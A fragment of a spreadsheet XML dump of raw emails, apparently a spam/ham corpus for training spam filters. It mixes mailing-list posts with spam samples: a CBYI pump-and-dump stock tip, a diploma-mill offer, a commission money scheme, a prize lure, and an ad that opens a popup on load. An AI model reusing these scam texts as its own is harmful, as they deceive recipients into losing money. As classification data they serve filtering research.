 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHfPrWwYyBBBkqU8niQ7RR" &gt;Change e-mail address&lt;/A&gt;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslKtPNomY0VXXjhrHNHdR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPu7h3HbNJlh9GpMUHM3rR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=66-kDH_IyWIFsfHG5JsPj9y-DzbW-iR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIOsSsoXzbDr4q1O7VpJlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdCXBD6P8Vb8HYULuonX9R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTGWCfQbSsIC1b2OB8OEuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKF_k8XkWxhOmI_uIUEksR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2hCmIMTUJaylIO7r3fxZR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e405&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=e5-9ZYO-7yD2t3Agt2Y0KFHoTQi9dRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">[Jeremy Hylton[
 &gt; The total collections are 1100 messages.  I trained with 1100/5
 &gt; messages.
 I'm reading this now as that you trained on about 220 spam and about 220
 ham.  That's less than 10% of the sizes of the training sets I've been
 using.  Please try an experiment:  train on 550 of each, and test once
 against the other 550 of each.  Do that a few times making a random split
 each time (it won't be long until you discover why directories of individual
 files are a lot easier to work -- e.g., random.shuffle() makes this kind of
 thing trivial for me).
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Register to win your Dream Vacation 22354
</t>
  </si>
  <si>
    <t xml:space="preserve">
 You have been specially selected to qualify for the following:
 Premium Vacation Package and Pentium PC Giveaway
 To review the details of the please click on the link 
 with the confirmation number below:
 http://vacation.1chn.com
 Confirmation Number#Lh340
 Please confirm your entry within 24 hours of receipt of this confirmation.
 Wishing you a fun filled vacation!
 If you should have any additional questions or cann't connect to the site 
 do not hesitate to contact me direct:
 mailto:vacation@btamail.net.cn?subject=Help!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">Jay Lake wrote:
 &gt;It's official, I'm a failure. Just finished listening to one of my high
 &gt;school classmates being interviewed on NPR about her new film that she
 &gt;wrote and directed, based on her recent successful book.   Do I have a
 &gt;film out? No. Do I have a successful book? No? Me, I spent nine months
 &gt;this year on the dole. Becky was off in Hollywood.
 #1 Those of us who are envious of your success as a writer and artist
 might find this a bit hard to understand.  
 #2 Once, when forced to mix with a wife's associate's [French] husband
 who spent most of his time blowing his horn about how he had wined and
 dined and hung out with the famous and wonderful, I became
 progressively more and more Jethro-like until I was using phrases like
 "Heehaw y'all -- you done talked to him!?"  My counterpart never
 noticed my evolutionary decline, even as hair sprouted from my
 knuckles, my forehead contracted, my eyebrows merged and I started
 grunting.  Fortunately, my wife intervened and I was prevented from
 doing my Moonwatcher imitation with the chicken bones left from
 dinner. Regression is a wonderful curative.   
 Rickk
 no truth to the rumour I scratched my armpit
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: FREE ORIGINAL STAR WARS CARDS Adv:
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Special Bonus with your order, you will receive
 &gt; 10 Original 1980 Topps Star Wars/Empire Strikes
 &gt; Back Collector Cards Absultely Free!
 &gt; These are Original 1980 Topps Star Wars/Empire
 &gt; Strikes Back Collector Cards from 22 years ago! Not reprints!
 I have a complete Blue and Red set (series 1 &amp; 2 from 1977), and many cards
 from  series 3-5. Guess they're not worth too much. This site lists them at
 $45-$60 per set.
 I do have a C-3PIO enhanced with penis card:
 http://pages.map.com/starwars/faq.html#penis
 - Jim
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-15 at 17:35, Jesse wrote:
 &gt; Short version:
 &gt; T-Mobile Broadband is in the process of wiring every starbucks in the area
 &gt; (T1 backhauled to some ~local POP + 802.11) as part of what I'm told is a
 &gt; national rollout. The Diesel is close enough to the Elm St starbucks for me
 &gt; to get reasonable net throughout most of the cafe. 
 &gt; 
 &gt; The rumor is that they'll be announcing that they've got boston covered on
 &gt; the 21st.  I've heard from at least one source that they're actually going
 &gt; to announce a much wider national rollout at that time.  It's not cheap [1], but
 &gt; for soemone like me who's running a ~virtual corporation, it's well worth it.
 &gt; 
 &gt; [1] https://accounts.tmobilebroadband.com/net_offers_promos.htm
 Very nice. Not sure it's worthwhile to pay for that when I'm already
 paying for cable modem at home, but... still nice to know I have the
 option.
 FWIW, slummerville actually has the internet- not just broadband, but
 actual broadband competition, which I gather is rare. I had ADSL and two
 cable options when I moved in.
 Luis
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-26
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Using Web Services with Perl and AppleScript
 +--------------------------------------------------------------------+
 | Using Web Services with Perl and AppleScript                       |
 |   posted by pudge on Wednesday September 25, @08:12 (links)        |
 |   http://use.perl.org/article.pl?sid=02/09/25/129231               |
 +--------------------------------------------------------------------+
 [0]jonasbn writes "An article on [1]Perl, AppleScript, and Web Services
 by Randal L. Schwartz has been published on O'ReillyNet." See AppleScript
 and Perl work together!
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/25/129231
 Links:
     0. mailto:jonasbnNO@SPAMe-diot.dk
     1. http://www.oreillynet.com/pub/a/javascript/synd/2002/09/24/applescript_perl.html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</si>
  <si>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On Mon, 2002-10-07 at 12:48, Owen Byrne wrote:
 &gt; I suppose Canada, which is supposed to be a "loose confederation" of 2 
 &gt; founding nations (French and English) can be cited as a success. The 
 &gt; jury is still out, but so far only a few brief rebellions and 
 &gt; referendums and such, still together after 130+ years.
 Alberta, and to a lesser extent some of the other Western provinces, is
 definitely not happy with the current arrangement.  Some of this has to
 do with the strange way the Canadian government is structured.  When I
 was last up in Alberta (a month ago), the newspapers were reporting
 something like 70% of Albertans favor separating from Canada, and over
 several distinct issues.
 The problem is basically that while Alberta is an economic powerhouse
 that is propping up the weaker economies of the Eastern provinces, their
 interests are openly and unapologetically ignored by the government in
 Ottawa.  While Alberta sends something like twice the tax dollars to
 Ottawa per capita of the average Canadian, they only have token
 representation in the federal government.  While I'm not clear on
 exactly how the government works up there, representation is not
 entirely based on population, and it works out that some eastern
 provinces with populations smaller than the city of Calgary alone have
 substantially more representatives in the legislature than the entire
 province of Alberta.  
 The long and the short of it is that the eastern provinces use Alberta
 as a personal ATM machine for their social programs while not even so
 much as throwing Alberta a bone, and are able to do so because even the
 sparsely populated eastern provinces can out-vote Alberta despite having
 fewer people.  Or something like that.  The Canadian government is less
 restricted than the US government, so they can do strange things, like
 having restrictive regulations that only apply to certain provinces,
 Alberta being on the receiving end of many such obscenities.  It is
 essentially a much worse version of what is happening in the
 inter-mountain West of the US.  Unlike the US case though, the rest of
 Canada would really be hurting if they weren't receiving all those tax
 dollars from Alberta.  OTOH, Alberta would probably thrive.
 I have friends in Alberta, and visit occasionally, but I'm not totally
 clear on everything that goes on in that country, due to my partial
 unfamiliarity with how the government works up there, so I'm a little
 fuzzy on some of the details.  What I do know is that on average the
 Albertans are quite unhappy with their current position in Canada and
 the sentiment has been getting worse over the years.
 Cheers,
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: YOUR financial SECURITY !    High PRIORITY !
</t>
  </si>
  <si>
    <t xml:space="preserve">When Economy goes down, WE go UP !
 $3000 COMMISSION per Sale for YOU !!
 With the POWER of F I N A N C I N G  !
 This is for SERIOUS people ONLY
 MAKE huge $3000 COMMISSIONS on every SALE!
 For only $300 down and $149 per month!
 Part time earnings: $ 6000 per month
 Full time earnings: $15,000 to 25,000 per month
 Easy, fast and fun !!
 Strictly NOT MLM !!
 Here YOU EARN MONEY IMMEDIATELY!
 If We have to prove it to You, We can and We will.
 My personal Bank Statement will speak for it.
 NEW ! ASSURED    F I N A N C I N G    AVAILABLE !!
 Where else DO YOU MAKE $3000 per sale ??
 Our Lease Program lets YOU start right away - It's Fast and Easy!
 Do not miss out, as THIS is a ONE TIME OFFER!
 Free training included!
 Program available in USA and Canada only!
 REQUEST more free info NOW!
 send an email to:      PaulBennert@excite.com
 with "SEND INFO" 
 in the subject line
 (do NOT click REPLY!)
 To remove, please send an email with REMOVE
 in the subject line to:  Plutoristal@excite.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] ADV:  Direct email blaster, email address extractor, maillist manager, maillist verify ............
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Origins of Software Engineering
</t>
  </si>
  <si>
    <t xml:space="preserve">The academic discipline of Software Engineering was launched at a conference
 sponsored by NATO, at Garmisch, Germany, in October, 1968. Intriguingly, the
 term Software Engineering was chosen to be deliberately provocative -- why
 can't software be developed with the same rigor used by other engineering
 disciplines?
 The proceedings of this conference are now available online, at:
 http://www.cs.ncl.ac.uk/old/people/brian.randell/home.formal/NATO/index.html
 Also, don't miss the pictures of attendees, including many significant
 contributors to the field of Software Engineering:
 http://www.cs.ncl.ac.uk/old/people/brian.randell/home.formal/NATO/N1968/inde
 x.html
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: REPORT FOR TODAY
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;HEAD&gt;
     &lt;TITLE&gt;
     &lt;/TITLE&gt;
 &lt;META http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Dwindo=
 ws-1252=22&gt;
     &lt;STYLE&gt;
 A:link =7B
     TEXT-DECORATION: none
 =7D
 A:active =7B
     TEXT-DECORATION: none
 =7D
 A:visited =7B
     TEXT-DECORATION: none
 =7D
 A:hover =7B
     COLOR: =230033ff; TEXT-DECORATION: underline
 =7D&lt;/STYLE&gt;
 &lt;META content=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;
 &lt;/HEAD&gt;
    &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgCo=
 lor=3D=22=23ffffff=22&gt;
        &lt;TABLE borderColor=3D=22=233366cc=22 cellSpacing=3D=224=22 cellPadding=3D=
 =2215=22 border=3D=224=22&gt;
            &lt;TR&gt;
                &lt;TD bgColor=3D=22=233366cc=22&gt;
                    &lt;DIV align=3D=22center=22&gt;                      
                       &lt;FONT face=3D=22arial, helvetica=22 color=3D=23ffffff&gt;=
                       &lt;FONT size=3D6&gt;                                 Fo=
 r 
                                        Immediate Release&lt;BR&gt;
                    &lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;
                &lt;TD&gt;
 &lt;P&gt;                  
                   &lt;FONT face=3D=22arial, helvetica=22 color=3D=23000000 size=
 =3D3&gt;                  
                   &lt;FONT 
       size=3D2&gt;&lt;STRONG&gt;Cal-Bay (Stock Symbol:&amp;nbsp;CBYI) 
       &lt;/STRONG&gt;Watch for analyst =22Strong Buy Recommendations=22 and sev=
 eral advisory newsletters 
       picking CBYI.&amp;nbsp;&amp;nbsp; CBYI has filed to be traded on the&amp;nbsp=
 ;OTCBB, 
       share prices historically INCREASE when companies get listed 
       on this larger trading&amp;nbsp;exhange. CBYI is trading around 25 ce=
 nts 
       and should skyrocket to =242.66 - =243.25 a share in the near futur=
 e. &amp;nbsp; 
       &lt;STRONG&gt;Put CBYI on your watch list, acquire a postion&lt;/STRONG&gt;&lt;/=
 FONT&gt;                  
                   &lt;FONT size=3D2&gt;&lt;STRONG&gt;TODAY.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/=
 P&gt;                  
                   &lt;FONT 
       face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;              =
                   &lt;FONT size=3D2&gt;
 &lt;P&gt;                             REASONS TO INVEST IN CBYI
                                  &lt;LI&gt;   A profitable company and is on =
 track to beat ALL 
       earnings estimates                                
                                 &lt;FONT size=3D2&gt;    =21&lt;/FONT&gt;
                                  &lt;LI&gt;One of the FASTEST growing distrib=
 utors in environmental &amp;amp; safety 
       equipment instruments.
                                  &lt;LI&gt;&lt;/FONT&gt;                           =
                                 &lt;FONT size=3D2&gt;Excellent management team=
 , several EXCLUSIVE 
       contracts.&amp;nbsp; IMPRESSIVE client list including the&amp;nbsp;U.S. A=
 ir Force, 
       Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=
       GE-Energy &amp;amp; Environmental Research.&lt;/FONT&gt;&lt;/FONT&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;RAPID=
 LY GROWING INDUSTRY&lt;/STRONG&gt;&amp;nbsp;&lt;BR&gt;Industry revenues exceed =24900 mil=
 lion, estimates indicate that there 
       could be as much as =2425 billion from =22smell technology=22 by the=
  end of 
       2003.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;=21=21=21=
 =21=21 CONGRATULATIONS 
       =21=21=21=21=21&lt;BR&gt;&lt;/STRONG&gt;Our last recommendation to buy&amp;nbsp;ORBT a=
 t 
       =241.29&amp;nbsp;rallied&amp;nbsp;and is holding steady at&amp;nbsp;=244.51=21&amp;n=
 bsp; 
       Congratulations to all our subscribers that took advantage of thi=
 s 
       recommendation.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;     =
                                 &lt;FONT 
       color=3D=230000ff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;
 &lt;P align=3D=22center=22&gt;&lt;STRONG&gt;                                
                                 &lt;FONT color=3D=23ff0000&gt;ALL removes HONER=
 ED. Please allow 7 
       days to be removed and send ALL address to:&lt;A href=3D=22mailto:NoMo=
 re=40btamail.net.cn=22&gt;
 NoMore=40btamail.net.cn
 &lt;/A&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/A&gt;&lt;/A&gt;&lt;/A&gt;&lt;/P&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/LI&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
        &lt;/TABLE&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;      
       &lt;FONT size=3D1&gt;Certain statements contained in this news release m=
 ay be 
 forward-looking statements within the meaning of The Private Securities=
 Litigation Reform Act of 1995. These statements may be identified by su=
 ch terms 
 as =22expect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or simila=
 r terms. We are NOT 
 a registered investment advisor or a broker dealer. This is NOT an offe=
 r to buy 
 or sell securities. No recommendation that the securities of the compan=
 ies 
 profiled should be purchased, sold or held by individuals or entities t=
 hat learn 
 of the profiled companies. We were paid =2427,000 in cash by a third par=
 ty to 
 publish this report. Investing in companies profiled is high-risk and u=
 se of 
 this information is for reading purposes only. If anyone decides to act=
  as an 
 investor, then it will be that investor's sole risk. Investors are advi=
 sed NOT 
 to invest without the proper advisement from an attorney or a registere=
 d 
 financial broker. Do not rely solely on the information presented, do a=
 dditional 
 independent research to form your own opinion and decision regarding in=
 vesting 
 in the profiled companies. Be advised that the purchase of such high-ri=
 sk 
 securities may result in the loss of your entire investment.&lt;/FONT&gt;    =
       &lt;FONT 
 size=3D1&gt;The owners of this publication may already own free trading sha=
 res in 
 CBYI and may immediately sell all or a portion of these shares into the=
  open 
 market at or about the time this report is published.&amp;nbsp; Factual sta=
 tements 
 are made as of the date stated and are subject to change without notice=
 .&amp;nbsp; 
 Not intended for recipients or residents of CA,CO,CT,DE,ID,      
       &lt;FONT 
 size=3D1&gt;IL,IA,LA,MO,NV,NC,OK,OH,PA,RI,TN,VA,WA,WV,WI. Void where 
 prohibited.&amp;nbsp;&lt;/FONT&gt;      
       &lt;FONT size=3D1&gt;Copyright c 2001&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
    &lt;/BODY&gt;
 &lt;/HTML&gt;
 *******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</si>
  <si>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[Razor-users] honor is not in csl
</t>
  </si>
  <si>
    <t xml:space="preserve">Folks, 
 Some of you seem to have hardcoded honor as the default catalogue server.
 There are three catalogue only servers running now, and honor is acting
 as a nomination only server. Tonight we will be completely turning off
 catalogue support on honor, so if you are specifying honor with the -rs
 option, please take it out and let the agents discover a closeby
 catalogue server.
 cheers,
 vipul.
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson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</si>
  <si>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Jesse Keating wrote:
 &gt;On Fri, 04 Oct 2002 01:14:28 +0200
 &gt;Vincent &lt;cult@free.fr&gt; wrote:
 &gt;
 &gt;# Hello,
 &gt;# 
 &gt;# I'm looking for the package k3b for the redhat 8.0, Does anyone know
 &gt;# 
 &gt;# where to get it ? I tried to compile but it did an error message:
 &gt;
 &gt;I've been working on a .src.rpm for it.  Their rpm and spec file is
 &gt;very dirty, so I"m cleaning it up.  I think I have all the build-req's
 &gt;and the install req's sorted out, but I need more testers.
 &gt;
 &gt;http://geek.j2solutions.net/rpms/k3b/
 &gt;
 &gt;Please try it.
 &gt;
 &gt;  
 &gt;
 If I get troubles with the .tar.gz source file compilation, will it work 
 with the .src.rpm source file compilation ?
 If it will, how do I manage with a .src.rpm file, sorry, I don't remeber :(
 Thanks.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Impress your friends with your new Diploma                 XDKOR
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;
 A.yellow:link {text-decoration: none; color: #FFF200}
 A.yellow:visited {text-decoration: none; color: #FFF200}
 A.yellow:active {text-decoration: none; color: #EFEFC8}
 A.yellow:hover {text-decoration: none; color: #FFFFFF}
 &lt;/style&gt;
 &lt;body topmargin=3D"0" bgcolor=3D"#FFFFFF"&gt;
 &lt;div align=3D"center"&gt;&lt;br&gt;
   &lt;table width=3D"650" border=3D"1" cellspacing=3D"0" cellpadding=3D"2" bo=
 rdercolor=3D"#000000"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"650" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "4" align=3D"center"&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"003366"&gt;&lt;font size=3D"2" color=3D"#FFFFFF" face=
 =3D"Arial, Helvetica, sans-serif"&gt;. 
               U N I V E R S I T Y . D I P L O M A S .&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"000000" height=3D"40" valign=3D"middle"&gt; 
               &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"2" color=3D"#FFFFFF"&gt;&lt;i&gt;Do 
                 you want for a prosperous future, increased money earning =
 power, 
                 and the respect of all?&lt;/i&gt;&lt;br&gt;
                 &lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"CC0033"&gt; 
               &lt;div align=3D"center"&gt; 
                 &lt;p&gt;&lt;b&gt;&lt;i&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-ser=
 if" size=3D"2"&gt;We 
                   can assist with Diplomas from prestigious non-accredited=
  universities 
                   based on your present knowledge and life experience.&lt;/fo=
 nt&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td background=3D"images/bg.jpg"&gt; 
               &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetic=
 a, sans-serif" size=3D"3"&gt;&lt;br&gt;
                 &lt;b&gt;&lt;font color=3D"#FF0000"&gt;No required tests, classes, boo=
 ks, or 
                 interviews.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; &lt;/div&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica,=
  sans-serif" size=3D"3"&gt;&lt;i&gt;Bachelors, 
                 masters, MBA, and doctorate (PhD) diplomas available in th=
 e field 
                 of your choice - that's right, you can become a Doctor, La=
 wyer or Accountant and receive 
                 all the benefits and admiration that comes with it!&lt;/i&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica,=
  sans-serif" size=3D"3"&gt;&lt;b&gt;&lt;font size=3D"5" color=3D"#0000FF"&gt;No 
                 one is turned down!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, Helvetica,=
  sans-serif" size=3D"3"&gt;&lt;i&gt;Confidentiality 
                 assured - Change your Life Today!&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
                 &lt;br&gt;
               &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"000000"&gt; 
               &lt;div align=3D"center"&gt; 
                 &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;br&gt;
                   Either &lt;b&gt;&lt;a href=3D"http://61.129.81.72/grf/diploma/dip=
 loma.htm" class=3D"yellow"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;a href=3D"http://61.129.81.7=
 2/grf/diploma/diploma.htm"&gt; &lt;/a&gt;or 
                   you can call us 24 hours a day, 7 days a week! &lt;font siz=
 e=3D"1"&gt;(including 
                   Sundays and holidays):&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
                 &lt;p&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;1 - 213 - 947 - 1009&lt;/font&gt;&lt;/b&gt; &lt;/fo=
 nt&gt; &lt;font size=3D"5" face=3D"Arial, Helvetica, sans-serif" color=3D"#FFFFF=
 F"&gt;
                   &lt;br&gt;
                   &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td bgcolor=3D"003366"&gt; 
               &lt;div align=3D"center"&gt;&lt;font size=3D"2" color=3D"#FFFFFF" fac=
 e=3D"Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a class=3D"yellow" href=3D"http://6=
 1.129.81.72/grf/diploma/diploma.htm"&gt;Contact 
                 us NOW&lt;/a&gt; to receive your diploma within days, and start =
 improving 
                 your life!&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table align=3D"center" width=3D"650" cellspacing=3D"2" cellpadding=3D"2" =
 border=3D"0" class=3D"footer2"&gt;
   &lt;tr&gt;&lt;td colspan=3D"2"&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-seri=
 f" size=3D"1"&gt;&lt;br&gt;
  &lt;font color=3D"ED1C24"&gt;Did you receive an email advertisement in error?&lt;/=
 font&gt; Our goal is to only target individuals who would like to take advant=
 age of our offers. If you'd like to be removed from our mailing list, plea=
 se click on the link below. You will be removed immediately and automatica=
 lly from all of our future mailings.&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt; &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D=
 "1"&gt;We protect all email addresses from other third parties. Thank you.&lt;/f=
 ont&gt;&lt;/td&gt;
 &lt;td align=3D"right"&gt;&lt;a href=3D"http://61.129.81.72/remove/remove.htm"&gt;&lt;fon=
 t face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;Please remove =
 me.&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I attended the same conference, and was impressed by a few systems that
 Jim didn't mention. In terms of CMS, the following all had apparently
 been used in some fairly large implementations and looked like some
 pretty strong competition to commercial systems:
 - Midgard, http://www.midgard-project.org/ , a PHP-based content
 management framework that with other programs combines to be a full CMS
 - Redhat CCM CMS, Java-based: http://www.spamassassin.taint.org/software/ccm/cms/
 - OpenCMS, Java-based: http://www.opencms.org
 There was agreement that usability has not generally been an open source
 strength, but both Plone and Xopus represented some real movement
 towards improving that situation.
 I was impressed by the spectrum of perspectives on XML. Some took for
 granted that XSLT was relevant to content management, others took it
 just as for granted that XSLT was irrelevant and seemed happy to ignore
 XML almost completely. 
 I attended realizing that "content management" is generally used to
 apply to *Web* content management, but I was still a bit shocked how
 completely out of scope document management was (almost no consideration
 of the potential print/PDF dimension to content other than the
 occasional "...and you can use FOP to make PDF" as if that was
 functional): this seems more the case in open source content management
 than in commercial content management, and probably makes XML easier to
 ignore (if HTML is the be-all and end-all of the output...).
 The honesty was refreshing, Phil Suh complained about the state of
 current tools (both open source and commercial), and I wish I'd written
 down what he said, something like "it sucks so extremely, it sucks so
 widely, and it is so generally sucking, that it seems sometimes there is
 no hope." For a moment there was contemplation that perhaps commercial
 systems scaled so well that the commercial "big boys" were really much
 more functional than open source, until someone pointed out, "OK, take
 some average blog software, spend $500,000 on the rollout... it'll scale
 pretty well." Another quote (citing Brendan Quinn): "content management
 problems are either trivial or impossible."
 Mac OS X is getting popular, of the laptops there it was an even 1/3
 each of Mac, Linux, Windows.
 I am sure it wasn't news to Jim, but I can't wait to try Subversion, a
 CVS replacement that supports some of the newer features of WebDAV:
 http://subversion.tigris.org/
 I'm also eager to try Xopus, I hope the developers make it back home
 safely, they said they'd only been in America four days but were already
 homeless...
 Max
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NORTON SYSTEMWORKS 2002 CLEARANCE SALE! 6801wbRq4-940mJbj463-19
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A6_30E15B3E.B5031C68
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMi8v
 RU4iPg0KPEhUTUw+DQoNCjxIRUFEPg0KCTxNRVRBIE5BTUU9IkdFTkVSQVRP
 UiIgQ29udGVudD0iVmlzdWFsIFBhZ2UgMS4wIGZvciBXaW5kb3dzIj4NCgk8
 TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5cGUiIENPTlRFTlQ9InRleHQv
 aHRtbDtDSEFSU0VUPWlzby04ODU5LTEiPg0KCTxUSVRMRT51bnRpdGxlZDwv
 VElUTEU+DQo8L0hFQUQ+DQoNCjxCT0RZIG9uTG9hZD0iKHdpbmRvdy5vcGVu
 KCdodHRwOi8vZXVyby5zcGVjaWFsZGlzY291bnRzNHUuY29tLycpKSI+DQoN
